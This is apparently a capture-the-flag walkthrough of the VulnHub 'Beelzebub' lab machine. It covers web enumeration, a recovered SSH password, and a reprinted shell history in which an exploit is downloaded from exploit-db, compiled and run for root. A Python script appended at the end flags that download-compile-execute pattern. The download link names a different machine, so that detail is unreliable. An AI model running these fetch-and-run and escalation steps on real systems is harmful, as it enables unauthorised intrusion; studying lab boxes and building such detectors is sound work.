- English name: BEELZEBUB: 1
- Chinese name: Beelzebub: 1
- Published date: September 8, 2021
- Difficulty: Easy
- Description: You have to enumerate as much as you can, and don't forget Base64.
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
1. The boot screen shows the username (krampus)
2. Host discovery (192.168.199.146)
3. Port scanning (ports 22 and 80)
4. Check the web page
5. Scan the directories
dirb http://192.168.199.146/
or
dirsearch -u http://192.168.199.146/
6. Visit the index home page
Check the page source of the index home page for clues
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
7. Compute the MD5 hash of beelzebub
└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
8. Tried to access the link, but was redirected with a 301
Suspected WordPress site
9. Enumerate the directory, which confirms that it is a WordPress site
dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
10. Try to access uploads
Click talk to valak
People who make a pact sometimes try to outwit the devil, but in the end they still fail.
11. Analyze the request with Burp and obtain the password M4k3Ad3a1
12. Try SSH login
13. Successfully obtain the regular user's flag
14. Look for clues (.bash_history)
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
15. View history
krampus@beelzebub:~$ cat .bash_history
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear
16. Following the hints in .bash_history, complete the privilege escalation and obtain the root flag
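The history in step 15 records repeated SUID searches followed by a download, rename, compile and run sequence. As an added example (not part of the original write-up), the following Python audit flags that pattern in a shell history; the rule names and the embedded sample, built from lines of the history above, are assumptions of this example.

```python
import os
import re
import shlex

# Constructed sample: lines taken from the .bash_history shown in step 15.
SAMPLE_HISTORY = """\
sudo -l
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
"""

# SUID hunting with find; the mistyped "-prem" still shows intent, so match it too.
SUID_HUNT = re.compile(r"^find\s+/\s.*-p(?:er|re)m\s+[-/]?(?:u=s|0?[4-7][0-7]{3})\b")

def _name(path):
    return os.path.basename(path.rstrip("/"))

def audit_history(text):
    """Return (line_no, rule, command, origin_url) findings for a shell history."""
    findings, tainted = [], {}   # tainted: file name -> URL it came from
    for no, line in enumerate(text.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:       # unbalanced quotes: skip the line
            continue
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if SUID_HUNT.search(line):
            findings.append((no, "suid-enumeration", line, None))
        elif cmd in ("wget", "curl"):
            for url in (a for a in args if re.match(r"https?://", a)):
                tainted[_name(url)] = url
                findings.append((no, "download", line, url))
        elif cmd == "mv" and len(args) == 2 and _name(args[0]) in tainted:
            tainted[_name(args[1])] = tainted[_name(args[0])]   # follow the rename
        elif cmd in ("gcc", "cc", "clang"):
            srcs = [a for a in args if _name(a) in tainted]
            out = args[args.index("-o") + 1] if "-o" in args[:-1] else "a.out"
            if srcs:                                  # built from a downloaded file
                tainted[_name(out)] = tainted[_name(srcs[0])]
                findings.append((no, "compile-downloaded-source", line, tainted[_name(out)]))
        elif "/" in cmd and _name(cmd) in tainted:    # run by path, e.g. ./exploit
            findings.append((no, "execute-downloaded-code", line, tainted[_name(cmd)]))
    return findings
```

Calling `audit_history(open(path).read())` on a collected history file returns the findings in order, each carrying the URL the executed file originated from.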
At this point, the experiment is complete~
Posted on 2022-08-22 21:46